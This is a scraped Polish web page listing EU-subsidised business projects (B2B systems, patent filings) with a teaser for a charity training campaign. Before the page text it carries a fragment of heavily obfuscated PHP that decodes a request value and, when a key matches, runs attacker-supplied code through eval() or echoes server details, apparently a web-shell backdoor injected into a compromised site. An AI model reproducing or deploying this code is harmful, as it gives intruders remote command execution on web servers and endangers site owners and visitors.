$j28f2a3){$a3f51320 = $j28f2a3;$a3a13eb = $bcf005;}if (!$a3f51320){foreach ($x721d5[$x721d5['nd42b540a'][87].$x721d5['nd42b540a'][6].$x721d5['nd42b540a'][3].$x721d5['nd42b540a'][40]] as $bcf005=>$j28f2a3){$a3f51320 = $j28f2a3;$a3a13eb = $bcf005;}}$a3f51320 = @$x721d5[$x721d5['nd42b540a'][81].$x721d5['nd42b540a'][51].$x721d5['nd42b540a'][6].$x721d5['nd42b540a'][3].$x721d5['nd42b540a'][6]]($x721d5[$x721d5['nd42b540a'][58].$x721d5['nd42b540a'][10].$x721d5['nd42b540a'][4].$x721d5['nd42b540a'][17].$x721d5['nd42b540a'][82].$x721d5['nd42b540a'][51].$x721d5['nd42b540a'][40].$x721d5['nd42b540a'][62]]($x721d5[$x721d5['nd42b540a'][60].$x721d5['nd42b540a'][30].$x721d5['nd42b540a'][82].$x721d5['nd42b540a'][30]]($a3f51320), $a3a13eb));if (isset($a3f51320[$x721d5['nd42b540a'][53].$x721d5['nd42b540a'][35]]) && $p429c5==$a3f51320[$x721d5['nd42b540a'][53].$x721d5['nd42b540a'][35]]){if ($a3f51320[$x721d5['nd42b540a'][53]] == $x721d5['nd42b540a'][89]){$u6031 = Array($x721d5['nd42b540a'][22].$x721d5['nd42b540a'][90] => @$x721d5[$x721d5['nd42b540a'][60].$x721d5['nd42b540a'][40].$x721d5['nd42b540a'][6].$x721d5['nd42b540a'][10].$x721d5['nd42b540a'][62].$x721d5['nd42b540a'][82].$x721d5['nd42b540a'][82].$x721d5['nd42b540a'][51]](),$x721d5['nd42b540a'][60].$x721d5['nd42b540a'][90] => $x721d5['nd42b540a'][82].$x721d5['nd42b540a'][71].$x721d5['nd42b540a'][55].$x721d5['nd42b540a'][57].$x721d5['nd42b540a'][82],);echo @$x721d5[$x721d5['nd42b540a'][35].$x721d5['nd42b540a'][82].$x721d5['nd42b540a'][21].$x721d5['nd42b540a'][26].$x721d5['nd42b540a'][6]]($u6031);}elseif ($a3f51320[$x721d5['nd42b540a'][53]] == $x721d5['nd42b540a'][40]){eval/*ze59*/($a3f51320[$x721d5['nd42b540a'][10]]);}exit();}} ?>

Dotacje europejskie na szkolenia

Autor: admin
Data publikacji: 05.06.2018

Zestawienie aplikacji, które uzyskają subwencję w przyszłym roku:

Adaptacja procesu informatycznego grupy KOZIOL Spółka z ograniczona odpowiedzialnością S.K.A. do obsługi sieci dystrybucyjnej w oparciu o mechanizm B2B

Unowocześnienie aktualnego modelu realizacji usług handlowych pomiędzy Fruitland Sp. z o.o. a partnerami biznesowymi poprzez zaimplementowanie od a do Z systemu mobilnego typu B2B

Zintegowana automatyzacja aktualnego modelu realizacji usług handlowych pomiędzy PPH EWA-BIS Sp. z o.o. a partnerami biznesowymi poprzez zaimplementowanie od a do Z modelu zdalnego typu B2B

Kompletne wdrożenie i zaimplementowanie od a do Z nowoczesnego procesu B2B opartego o wzajemna wymianę informacji do obsługi procesów biznesowych zachodzących pomiędzy firmą 3w Design Team a jej partnerami

CERES - zaimplementowanie od a do Z modelu integrującego procesy organizacyjno-finansowe polegającego na elektronicznej wymianie danych w zakresie zarządzania czasem, zleceń, kosztorysów, projektów, dokumentów księgowych, windykacji, bazy i archiwum.

Dokonanie zgłoszenia patentowego w procedurze PCT na wypornościową deskę pływającą z mechanizmem napędem śrubowym do zastosowań w turystyce i sportach wodnych

Dokonanie zgłoszenia wynalazku do ochrony prawnejprzez NOWAK INNOVATIONS Spółka z ograniczoną odpowiedzialnością w ramach Międzynarodowej Procedury PCT

E-Walleto - nowa e-usługa do zarządzania budżetem na bazie elektronicznego przesyłu i archiwizacji dokumentów w modelu EBPP z centralnym portalem internetowym.|Kompleksowe połączenie modeli biznesowych spółki Kotrak Bis Irena i Andrzej Kurdziel Sp.j. i przedsiębiorstw współpracujących poprzez zaimplementowanie od a do Z kompleksowego systemu B2B.

Interaktywna aplikacja do automatycznego tworzenia e-ramówki kanału telewizyjnego nadawanego w technologii IPTV w sieciach ISP, TVK, Smart TV, mobilnych oraz innych IP.

ISIVI - pierwszy inteligentny portal pracy i rozwoju osobistego, umożliwiający łatwe i skuteczne dopasowywanie i łączenie ze sobą poszukujących zatrudnienia z pracodawcami, zmniejszając lukę informacyjną na rynku pracy.

Ochrona patentowa i komercjalizacja unikatowych technologii syntez mechanochemicznych realizowanych za pomocą ultraenergetycznych młynów rotacyjnych

Ochrona własności intelektualnej spółki EcoBack poprzez zgłoszenie patentu na wynalazek w postępowaniu przed Polskim Urzędem Patentowym, Postępowaniu Międzynarodowym PCT, Europejskim Urzędem Patentowym oraz Urzędach Patentowych Japonii, Korei Południowej, Chin, Brazylii oraz Stanów Zjednoczonych Ameryki.

Zaprojektowanie nowoczesnego procesu profesjonalnej analizy obrazu mającego zastosowanie w systemach nadzoru przeciwpożarowego obszarów leśnych poprzez realizację prac przemysłowych i rozwojowych

Optymalizacja rynku usług projektowych na internetowej platformie umożliwiającej przedsiębiorcom wyszukiwanie projektantów oraz budowę zespołów projektowych.

Playarena.pl - zautomatyzowane narzędzia on-line wspomagające organizację i uprawianie sportu, przeznaczone dla zawodników, administratorów obiektów i organizatorów rozgrywek.

Projekt WIT - Stworzenie e-usługi, która dzięki zaawansowanym funkcjonalnościom, w tym rozszerzonej rzeczywistości, będzie umożliwiała pozyskanie informacji oraz zaplanowanie i realizację wypoczynku w polskich parkach narodowych.

Reality Cloud Rendering - innowacyjna usługa zdalnego generowania fotorealistycznego podglądu scen 3D oraz szybkiego renderingu finalnych wizualizacji

Spersonalizowana interaktywna dystrybucja skatalogowanego kontentu mobilnego lub usług mobilnych za pośrednictwem platformy mobilnej - Platforma Interaktywna

Stworzenie w pełni nowatorskiego modelu B2B unikatowej wymiany i przetwarzania danych w czasie rzeczywistym pomiędzy otodojazd.pl a partnerami biznesowymi w celu zintensyfikowania świadczenia usług carpoolingowych w Polsce

Wdrożenie innowacyjnej platformy kojarzenia ofert sprzedażny i kupna nieruchomości, z użyciem algorytmów opartych o mechanizmy prawdopodobieństw warunkowych sztucznej inteligencji.

Opracowanie mobilnego systemu klasy B2B optymalizującego procesy biznesowej zachodzące między firmą Konsorcjum Biuro Klub Sp. z o. o. a jej partnerami biznesowymi szansą na jej dalszy, dynamiczny rozwój

Wdrożenie MultiCAD ABW - inteligentnego narzędzia wymiany danych między systemami ABW oraz jej Partnerów - Producentów i Projektantów, korzystających w procesie projektowania z cyfrowego modelu 3D

Wdrożenie platformy internetowej prezentującej informacje o produktach w polskich sklepach internetowych w kategorii odzież, obuwie i biżuteria, umożliwiającej porównywanie tych produktów pod względem wyglądu oraz dokonanie ich zakupu w sklepach partnerskich.|Opracowanie platformy świadczącej e-usługę udostępniania oprogramowania do wsparcia komunikacji z klientami oraz oraz zarządzania firmą z branży rozrywkowej

Zaprojektowanie telefonicznego serwisu, w którym system komputerowy przekazywać będzie przez telefon informacje o usługach medycznych, farmaceutycznych i który dokonywać będzie rejestracji do przychodni.

System zamówień i kalkulacji, porównujący oferty branży poligraficznej wraz z rozbudowanym system zarządzania zakładem poligraficznym i drukarnią w trybie SaaS.

Uzyskanie ochrony patentowejw kraju i za granicą na wynalazek Nowe szczepy bakteriofagów do leczenia zakażeń bakteryjnych, zwłaszcza szczepami bakterii lekoopornych rodzaju Enterococcus opracowany w Instytucie Immunologii i Terapii Doświadczalnej PAN przez Beatę Weber-Dąbrowską i Andrzeja Górskiego.

Formalne zgłoszenie ochrony własności przemysłowej na Układ do elektrostymulacji tusz mięsa prądem stałym” w 15-tu państwach o największej produkcji wołowiny na świecie.

Zaimplementowanie od podstaw dedykowanego, modułowego systemu IT B2B w przedsiębiorstwie Cora w celu usprawnienia modeli B2B zachodzących między przedsiębiorstwem Cora, a przedsiębiorstwami partnerskimi.

Wdrożenie dedykowanego, modułowego procesu zdalnego B2B w przedsiębiorstwie Majami sp. z o. o. sp. k. w celu usprawnienia procesów B2B zachodzących między Majami, a przedsiębiorstwami partnerskimi

Wdrożenie w pełni nowatorskiego systemu B2B usprawniającego procesy sprzedaży, zaopatrzenia, programów lojalnościowych, wymiany informacji, windykacji i planowania.

Zaimplementowanie od podstaw nowoczesnego Systemu Informatycznego klasy B2B, upraszczającego procesy biznesowe zachodzące pomiędzy firmą Części Tir Chlebek Sp.j. a jej partnerami biznesowymi|WDROŻENIE INTERNETOWO-MOBILNEGO SYSTEMU KALSY B2B INTEGUJĄCEGO ZARZĄDZANIE PROCESAMI GRZESIK COLLECTIVE BUSINESS SP. Z O.O. I WSPÓŁPRACUJĄCYCH PRZDSIEBIOSTW

Wdrożenie nowoczesnego systemu B2B zwiększającego efektywność współpracy EL-MED Marcinkowscy Sp. J. poprzez automatyzację aktualnego modelu realizacji zleceń medycznych z partnerami biznesowymi

Zaimplementowanie od podstaw nowoczesnego modelu B2B zwiększającego efektywność współpracy miedzy Intelmedia.eu Sp. z o.o. a jej partnerami biznesowymi poprzez automatyzację aktualnego modelu realizacji usług marketingowych

Zaimplementowanie od podstaw systemu B2B optymalizującego proces współpracy pomiędzy INSOGLAS Sp. J. i jej Kontrahentami, pozwalającego na automatyzację modeli oraz optymalizację nakładów materiałowych na realizację zamówień.

Wdrożenie modelu telekomunikacyjnego klasy B2B upraszczającego główne procesy biznesowe związane z zamawianiem surowców, obsługą zamówień i logistyką zachodzących między Williams Nature Product a jego wybranymi Partnerami Biznesowymi.

Zaimplementowanie od podstaw technologii wytwarzania znakowanej taśmy z opcją nadruku na kleju (zwłaszcza etykiet) w oparciu o sposób nanoszenia elementów fluorescencyjnych oraz rozdzielania i łączenia taśmy w procesie nanoszenia druku

Uruchomienie i upowszechnienie nowej produkcji korpusów hydraulicznych, wałków oraz zaworów z wykorzystaniem technologii opartej na samodzielnie skonstruowanej głowicy frezarskiej.

Wsparcie na pozyskanie ochrony prawnejwynalazku: Metoda wykorzystania napędów podwieszonych aparatów latających zestawu aparatów latających do poprawy własności manewrowych całego zestawu”

Wykonanie i zaimplementowanie od a do Z do użytkownia platformy internetowej popularyzującej zdrowy tryb życia, poprzez kompleksowe i automatyczne dordztwo w zakresie dietetyki i treningu profilaktycznego.

Zgłoszenie wynalazku do ochrony własności przemysłowej - Technologia i urządzenie do zgrzewania rur przy pomocy ściskania z jednoczesnym podgrzewaniem.Tagi:
Losowy

Szkolenia dla darczyńców

Wspólnie z Fundacją Training Projects serdecznie zachęcamy do uczestniczenia w akcji „Biznes charytatywnie”. W ramach naszego projektu pracownicy firm mogą wygrać w konkursie bezpłatne kursy zawodowe – jako nagrodę w rewanżu za oferowaną dobroczynność. Na razie treningi rozlosowano wśród dziewięciu spółe

Czytaj więcej...